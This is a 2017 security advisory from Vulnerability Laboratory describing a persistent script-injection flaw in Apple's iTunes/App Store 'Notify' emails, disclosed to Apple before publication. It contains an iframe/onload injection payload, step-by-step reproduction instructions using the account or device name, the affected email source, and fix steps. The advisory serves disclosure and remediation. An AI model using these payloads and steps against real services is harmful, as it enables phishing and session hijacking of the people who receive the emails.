Document Title: =============== Apple (iTunes Notify) - Bypass & Persistent Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2024 Followup ID: 654962036 Vulnerability Magazine: https://www.vulnerability-db.com/?q=articles/2016/12/22/apple-ios-102-notify-function-vulnerable-attacks-idevice-itunes-appstore Release Date: ============= 2017-01-16 Vulnerability Laboratory ID (VL-ID): ==================================== 2024 Common Vulnerability Scoring System: ==================================== 3.8 Product & Service Introduction: =============================== iOS is a mobile operating system created and developed by Apple Inc. exclusively for its hardware. It is the operating system that presently powers many of the company's mobile devices, including the iPhone, iPad, and iPod touch. (Copy of the Homepage: https://en.wikipedia.org/wiki/IOS ) iTunes is a media player, media library, online radio broadcaster, and mobile device management application developed by Apple Inc. It is used to play, download, and organize digital downloads of music and video (as well as other types of media available on the iTunes Store) on personal computers running the macOS and Microsoft Windows operating systems. The iTunes Store is also available on the iPhone, iPad, and iPod Touch. Through the iTunes Store, users can purchase and download music, music videos, television shows, audiobooks, podcasts, movies, and movie rentals in some countries, and ringtones, available on the iPhone and iPod Touch (fourth generation onward). Application software for the iPhone, iPad and iPod Touch can be downloaded from the App Store. iTunes 12.5 is the most recent major version of iTunes, available for Mac OS X v10.9.5 or later and Windows 7 or later; it was released on September 13, 2016. iTunes 12.2 added Apple Music to the application, along with the Beats 1 radio station, and iTunes 12.5 offers a refinement of the Apple Music interface. (Copy of the Homepage: https://en.wikipedia.org/wiki/ITunes ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a persistent input validation vulnerability and mail encode issue in the official apple itunes online service web-application. Vulnerability Disclosure Timeline: ================================== 2016-12-15: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH) 2016-12-16: Vendor Notification (Apple Product Security Team) 2016-12-16: Vendor Response/Feedback (Apple Product Security Team) 2017-**-**: Vendor Fix/Patch (Apple Cupertino Service Developer Team) 2017-**-**: Security Acknowledgements (Apple Product Security Team) 2017-01-16: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Apple Product: iTunes & AppStore - Online Service (Web-Application) 2016 Q4 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A persistent input validation vulnerability and mail encode issue has been discovered in the official apple itunes online service web-application. The persistent vulnerability allows remote attackers to inject own malicious script codes to the application-side of the vulnerable module or function. The vulnerability is located in the new iTunes and Appstore `Notify` function for iOS 10 devices. The function does take the user credentials of the icloud or devicename values to perform the notify. The performed outgoing email of the new-itunes services has not parse mechanism for the user credentials streamed through the email client. Thus allows remote attackers to inject own malicious payloads to execute them within the introduction word line were the name is visible in the email body of the notify message. The request method is a sync via the device and the attack vector is persistent. The injection point are the user credentials of the `firstname` parameter and the execution point occurs in the outgoing email by the "@new.itunes.com" email sender. The same type of vulnerability has been disclosed already by our team in the invoices of the appstore and itunes in 2015. (Ref: https://www.vulnerability-lab.com/get_content.php?id=1512 ) The vulnerability can be exploited on restricted accessable ios devices to the main account holder inbox. The issue could be used as well to continue the calender spam activities. The security risk of the persistent input validation and mail encoding web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 3.8. Exploitation of the persistent input validation and mail encoding web vulnerability requires a low privilege apple (appstore/itunes) account and low or medium user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent redirect to external sources and persistent manipulation of affected or connected service module context Vulnerable Module(s): [+] Notify (New Function) Vulnerable Paramter(s): [+] firstname & name Affected Module(s): [+] Outgoing Service Notify Email Body Affected Sender(s): [+] do_not_reply@new.itunes.com Proof of Concept (PoC): ======================= The persistent input validation and mail encode vulnerability can be exploited by remote attackers with low privilege user account and with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Payload(s) >"<iframe src="evil.source" onload=alert("ITUNESHACKWITHMARIO")> Manual steps to reproduce the vulnerability ... (via icloud on old entries) 1. First you need to have an exisiting account with a script code payload in the firstname and lastname 2. Login with the account and move into the idevice 3. Then open the itunes app or appstore app 4. Search for super mario run and the new notification button 5. Activate the activation button Note: Now wait until the app is available because then you will receive a notify email with the name credentials 6. The email arrives to the inbox with manipulated credentials in the firstname and lastname of the email body introduction word "Hello" Manual steps to reproduce the vulnerability ... (without icloud on new entries) 1. Change device name to a script code payload (exp ipad2) 2. Then move to the appstore or itunes app 3. Search for super mario run and click to process the notification 4. In the moment the release becomes available an email will arrive with the values used by the device or account 5. The email arrives to the inbox with manipulated credentials in the firstname and lastname of the email body introduction word "Hello" Note: The issue is similar to the already discovered itunes invoice vulnerbility exploited in 2015. The new.itunes.com service does not have the secure validation because it has implemented lately. Due to the taken values of the user account during the activate of the notify button the issue can be exploited. We prepared the exploitation already in september and got the confirm with the super mario run release in the eu around 15th. PoC: Vulnerable Source (Email - ) <!-- end table containing Apple logo --> <!-- begin table containing body copy --> <table style="margin:0 auto" class="appl_100" width="600" cellspacing="0" cellpadding="0" border="0"> <tbody><tr><td class="appl_stack" valign="top" align="left"> <!-- begin table containing individual app --> <table width="100%" cellspacing="0" cellpadding="0" border="0"> <tbody><tr><td class="appl_app_txt" style="padding-bottom:14px;" align="left"> <div style="font-family:Helvetica Neue, Helvetica,Lucida Grande,Lucida Sans,Lucida Sans Unicode,Arial,sans-serif;color:#444444;font-size:14px;line-height:1.32em;"> Hallo >"<iframe src="evil.source" onload="alert("ITUNESHACKWITHMARIO")">, </div></td></tr> <tr><td align="left" class="appl_app_txt" style="padding-bottom:14px;"> <div style="font-family:Helvetica Neue, Helvetica,Lucida Grande,Lucida Sans,Lucida Sans Unicode,Arial,sans-serif;color:#444444;font-size:14px;line-height:1.32em;"> du wolltest benachrichtigt werden, wenn es soweit ist – „Super Mario Run“ von Nintendo ist jetzt erhältlich. Du kannst das Spiel im App Store auf deinem iPhone oder iPad laden. <br/><br/><a href="http://new.itunes.com/r?v=2&la=de&lc=de&a=FOqorWUXVdIQSl%2BmwRhvEMkn5ABvajpZZ04kDWpusUAHBdiykmA79VRZJzTLitI%2F&ct=aI6r3a7q6p" style="color:#0088cc" class="appl-link">Jetzt laden</a> <BR><BR> Beste Grüße<br/> Das App Store-Team Vulnerable Email (Header) Return-Path: <donotrep_nt_bounces@new.itunes.com> ------=_Part_10460774_1004383268.1481850993725 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline Hallo >"<iframe src="evil.source" onload=alert("ITUNESHACKWITHMARIO")>, du wolltest benachrichtigt werden, wenn es soweit ist =E2=80=93 =E2=80=9ESu= per Mario Run=E2=80=9C von Nintendo ist jetzt erh=C3=A4ltlich. Du kannst da= s Spiel im App Store auf deinem iPhone oder iPad laden.=C2=A0 Jetzt laden http://new.itunes.com/r?v=3D2&la=3Dde&lc=3Dde&a=3DFOqorWUXVdIQSl%2BmwRhvEMk= n5ABvajpZZ04kDWpusUAHBdiykmA79VRZJzTLitI%2F&ct=3DaI6y6a2j9C Beste Gr=C3=BC=C3=9Fe Das App Store-Team Reference(s): https://itunes.apple.com/us/app/super-mario-run/id1145275343 Solution - Fix & Patch: ======================= The vulnerability can be patched by the following solution steps ... 1. Disallow the usage of special chars for the name variable (firstname) to prevent the injection point. 2. Parse in the @new.itunes.com sender the outgoing name values to prevent the execution point. 3. Use only the icloud credentials were a secure protection on input has implemented during the time. Security Risk: ============== The security risk of the persistent validation web vulnerability and mail encode issue in the itunes notify function is estimated as medium. (CVSS 3.8) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri [http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission. Copyright A(c) 2017 | Vulnerability Laboratory - [Evolution Security GmbH]aC/ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com